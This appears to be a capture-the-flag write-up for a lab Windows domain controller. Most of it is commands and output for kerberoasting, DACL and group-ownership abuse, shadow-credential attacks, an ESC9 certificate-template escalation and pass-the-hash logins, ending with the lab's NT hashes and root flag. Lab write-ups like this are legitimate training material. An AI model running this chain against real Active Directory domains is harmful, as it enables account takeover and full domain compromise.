User
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
| Open 10.129.231.186:53
Open 10.129.231.186:88
Open 10.129.231.186:139
Open 10.129.231.186:135
Open 10.129.231.186:389
Open 10.129.231.186:445
Open 10.129.231.186:464
Open 10.129.231.186:593
Open 10.129.231.186:636
Open 10.129.231.186:3269
Open 10.129.231.186:3268
Open 10.129.231.186:5985
Open 10.129.231.186:9389
|
from ldap we know
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| ❯ ldapsearch -x -H ldap://10.129.231.186 -s base -b ""
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=certified,DC=htb
ldapServiceName: certified.htb:dc01$@CERTIFIED.HTB
isGlobalCatalogReady: TRUE
...
...
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| ❯ nxc smb 10.129.231.186 -d certified.htb -u judith.mader -p 'judith09' --users
SMB 10.129.231.186 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.186 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.129.231.186 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.231.186 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain
SMB 10.129.231.186 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.231.186 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account
SMB 10.129.231.186 445 DC01 judith.mader 2024-05-14 19:22:11 0
SMB 10.129.231.186 445 DC01 management_svc 2024-05-13 15:30:51 0
SMB 10.129.231.186 445 DC01 ca_operator 2024-05-13 15:32:03 0
SMB 10.129.231.186 445 DC01 alexander.huges 2024-05-14 16:39:08 0
SMB 10.129.231.186 445 DC01 harry.wilson 2024-05-14 16:39:37 0
SMB 10.129.231.186 445 DC01 gregory.cameron 2024-05-14 16:40:05 0
|
now since we have some users first we try kerberoasting and then as-rep roasting
1
2
3
4
5
6
| ❯ ntpdate -q 10.129.231.186
server 10.129.231.186, stratum 1, offset +25201.247811, delay 0.34071
...
...
>>> 25201/3600
7.000277777777778
|
1
2
3
4
5
6
7
8
9
10
11
| ❯ faketime -f "+7h" GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186 -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 21:00:51.476756 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$bb542d661c04a963c1e7ba51fdcdca6b$184fd05e40b8e1269aee20ba1205cbc8c9afda0cf2d883bfdb45b8a7973979c88ec924db383f51d9f939bd6a8a82494955be24074a5ca810885d8e2a57e5c7a0253b37c20f990d8b039fba4ff1cc0c0598ae17c3b4b52d91d976e3e15c95d37683855baebea6d1900dc2583f07d256e36ceb7b5d145971c2cdfe893df45199ebfd9d9e3efb7c8d1bfbc2501e8efb962274a429b38e71d5872e2061f586ec3903016404ff7709c552ec5c7e76874b67a208cd703b09192206f24b7330555d167a92399ee6b84b925b8605a675d3af8a59920b0fc23b328a0fceb99592c3862f233166452fdd5f465207c6bb427927efea80fd6b5433f26b57c8bd66f4cfcbcea56e171db16320339ca3d16acc3427fd46fd0f102a71e586b42fc211d0d13cd6c3038236ef40fb70b8ab95c9255b0c9fa721b7c9031d092f3c6cd2cdc791e682cbac9b6607ecb6945f91ef96ec41c1ccea07a9d5e1015b7ab2238c1e359f2fcd782e52d93ea5664139e4eb7a9e670a5a478fa7bf8dccdcf74ff9efc768c374209b5f0870b7cfda9d4e79425753ca9fbb3e57395af7399e66792843dbeedd1c315ebda71b37e42ef9c447046282310d8e33fa03b923bd968bf213e21fac805ddcba150707cbb2db9ede2afc1b28e33e65931b4010968a631874cf89d7738fa9b3eb26f47ad46df36f0b785938fb810938dd2aa03c491b7c6cc567da0ba2b3ef2eb66b2611f8fe1ad5835a0bec064f17b11eab32619fff2b44d560e2b312a0cc038c7e89c550303c933abc8162b5c7e974085590382bb5962a70f9202ed56bcf00317d33175c6036efd7b08e8d3a7999bdc0e2db11b3e828f851927d7765b8a7a0523a4c3b64eee2785857db6378af9223e7a2c22c601dfb58572e4530c8b5ad080c1e34884417b0fd360fdc1361f7b80e8b97660588f39524c6d462172cb6299dcb593145153543c5db291c396674aac1ef561d507db6a0c8babb1317da6357d0678556c6228b341cd9130c7dc3ceafe3900e5919e1fcba74839fc87547053b964d41dc5e8ab5563de10ea812111d5c4297fb05c57af996cb73c9b0fd405e4f4a094e55f3b8ce8445400f415c7a5bea8583a3f5739c54abecb2d8373b7511a1e7a56c3b00dfcb08d9ff2cfbb31bc42ae4ddf086411b5c98cb20f177e5c27798bb5139f6eb1df48c8c28950bdf4642c5156593890864e83a748c4057e9a75f12626c79e9c335d91b5e01fb074b272da1f56ab26ba3a98ec3124a792b735899c59244ce1f8f5f9eb1e840586032fdb24654f7d6ba1ad3f0dcdff7cf669e9cc5e548b1a4b0be9249601f3ff258f391c9ad6a44383bf3a10b30ac7226ffa8314f2fc6fad93180b6b3bd67db56ccba4eea8fe4e695e16c87601c5aa97869ee5b56b4b97fd68d96b91e8363eed2515d7bc1702f9d3a7da12673218237e8a01feb9b8ccad762643ccb65c913a897c4b197bf437c530db219314b7f21eff75e9e9de00df6d70946f7202b55861d77848d994ab08dbbbeb51fd9b25a654ff7c076617f00beceb15ab8d0342570f82d9acdb27be75915079476f80a513c591dba
|
using bloodhound
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
| ❯ certipy find -u 'judith.mader@certified.htb' -p 'judith09' -dc-ip 10.129.231.186 -enabled -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates : [!] Could not find any certificate templates
|
no exploitable certs now to exploit writeowner over management group and generic write over management user and then generic all over ca operator user
1
2
3
4
5
6
7
8
| ❯ owneredit.py -action write -new-owner judith.mader -target management certified/judith.mader:judith09 -dc-ip 10.129.231.186
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
|
now give fullcontrol rights to judith over management group
1
2
3
4
5
6
| ❯ dacledit.py -action write -rights FullControl -inheritance -principal judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20260620-120827.bak
[*] DACL modified successfully!
|
adding judith to the management group
1
| ❯ net rpc group addmem Management judith.mader -U 'certified.htb/judith.mader%judith09' -S 10.129.231.186
|
verify using
1
2
3
| ❯ net rpc group members Management -U 'certified.htb'/'judith.mader%judith09' -S 10.129.231.186
CERTIFIED\judith.mader
CERTIFIED\management_svc
|
now we perform a shadow creds attack we can use certipy for that as well
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ❯ faketime -f "+7h" certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '637b8f4d9ae8468fa5202e0967fdb8ab'
[*] Adding Key Credential with device ID '637b8f4d9ae8468fa5202e0967fdb8ab' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '637b8f4d9ae8468fa5202e0967fdb8ab' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
|
1
2
3
4
5
6
| ❯ nxc smb 10.129.231.186 -d certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
SMB 10.129.231.186 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.186 445 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584
❯ nxc winrm 10.129.231.186 -d certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
WINRM 10.129.231.186 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
WINRM 10.129.231.186 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
|
now we can use evil-winrm to get user flag
Root
since management_svc has generic all over ca_operator we can get the ntlm hashes of ca op using same shadow attack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ❯ faketime -f "+7h" certipy shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ded282ddfbea489389f467b8f2ba0ee6'
[*] Adding Key Credential with device ID 'ded282ddfbea489389f467b8f2ba0ee6' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID 'ded282ddfbea489389f467b8f2ba0ee6' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_operator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_operator.ccache'
[*] Wrote credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2
|
using certipy again to find vulnerable templates
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
| ❯ certipy find -u 'ca_operator@certified.htb' -hashes ':b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.129.231.186 -enabled -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectRequireDirectoryPath
Enrollment Flag : PublishToDs
AutoEnrollment
NoSecurityExtension
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-05-13T15:48:52+00:00
Template Last Modified : 2024-05-13T15:55:20+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\operator ca
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\Administrator
Full Control Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Write Owner Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Write Dacl Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Write Property Enroll : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
[+] User Enrollable Principals : CERTIFIED.HTB\operator ca
[!] Vulnerabilities
ESC9 : Template has no security extension.
[*] Remarks
ESC9 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
|
CertifiedAuthentication is vulnerable to ESC9 now since management_svc has genericall over ca_operator we can use it to update UPN to Administrator
1
2
3
4
5
6
| ❯ certipy account update -u management_svc@certified.htb -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn Administrator -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
|
now requesting cert
1
2
3
4
5
6
7
8
9
10
11
| ❯ certipy req -u ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.129.231.186 -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
|
now changing upn of ca_operator back to its original state
1
2
3
4
5
6
| ❯ certipy account update -u management_svc@certified.htb -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn ca_operator -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator
[*] Successfully updated 'ca_operator'
|
now using that cert to get administrator hashes
1
2
3
4
5
6
7
8
9
10
11
12
| ❯ faketime -f "+7h" certipy auth -pfx administrator.pfx -dc-ip 10.129.231.186 -domain certified.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
|
and the root flag
1
2
3
4
5
6
7
8
| ❯ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
Evil-WinRM shell v3.9
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\Desktop\root.txt
9abb9a033437b2d7f2dce82ebca59c79
|